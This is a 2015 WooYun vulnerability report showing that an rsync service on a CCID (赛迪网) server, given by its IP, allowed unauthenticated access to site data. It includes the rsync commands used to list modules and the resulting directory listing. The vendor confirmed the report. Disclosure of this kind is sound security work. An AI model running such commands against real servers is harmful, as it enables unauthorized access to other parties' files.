当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125443

漏洞标题:赛迪网某处rsync未授权大量数据可被下载

相关厂商:赛迪网

漏洞作者: myhalo

提交时间:2015-07-09 14:05

修复时间:2015-08-24 13:42

公开时间:2015-08-24 13:42

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

扫~~~

详细说明:

1.png


115.182.21.14

漏洞证明:

root@k:~# rsync 115.182.21.14::
www
attachment
PageCache
pub
html
root@k:~# rsync 115.182.21.14::www
drwxr-xr-x 4096 2014/10/31 08:38:59 .
-rw-r--r-- 1122123 2013/06/17 12:57:13 jd.zip
lrwxrwxrwx 21 2010/05/27 10:56:26 news
lrwxrwxrwx 10 2010/05/27 10:56:26 pub
lrwxrwxrwx 24 2010/05/27 10:56:26 service
drwxrwxrwx 4096 2012/08/04 08:58:58 2008
drwxr-xr-x 4096 2007/08/28 16:20:19 all
drwxrwxr-x 4096 2013/11/13 11:00:49 ccidedm
drwxr-xr-x 4096 2011/03/29 13:21:38 ceo
drwxr-xr-x 4096 2007/08/07 17:00:08 chat
drwxr-xr-x 4096 2005/09/22 10:31:02 chengdu
drwxrwxrwx 4096 2014/05/18 05:40:40 comm
drwxr-xr-x 4096 2005/09/22 10:31:08 guangzhou
drwxrwxr-x 4096 2010/06/22 14:12:23 itsearch
drwxr-xr-x 4096 2013/07/04 09:43:10 jd
drwxr-xr-x 4096 2007/08/07 17:04:18 live
drwxr-xr-x 4096 2005/09/22 10:32:18 mall
drwxr-xr-x 4096 2005/09/22 10:32:27 manual
drwxr-xr-x 4096 2013/07/02 17:09:08 mi
drwxr-xr-x 4096 2007/04/13 10:57:38 mobile
drwxr-xr-x 4096 2008/07/14 14:12:36 people
drwxr-xr-x 4096 2005/09/22 10:31:45 shanghai
drwxr-xr-x 4096 2014/02/20 09:08:28 ssi_include
drwxr-xr-x 4096 2005/09/22 10:31:51 wwwcn
drwxr-xr-x 4096 2010/05/27 10:42:00 zhongsoucomm
drwxr-xr-x 4096 2010/05/27 10:42:00 zhongsounews
dr-------- 4096 2013/07/19 15:34:28 zydy
dr-------- 4096 2013/07/19 15:30:19 zytd

修复方案:

找运维

版权声明:转载请注明来源 myhalo@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-07-10 13:41

厂商回复:

谢谢提醒,已经着手处理

最新状态:

暂无


漏洞评价:

评论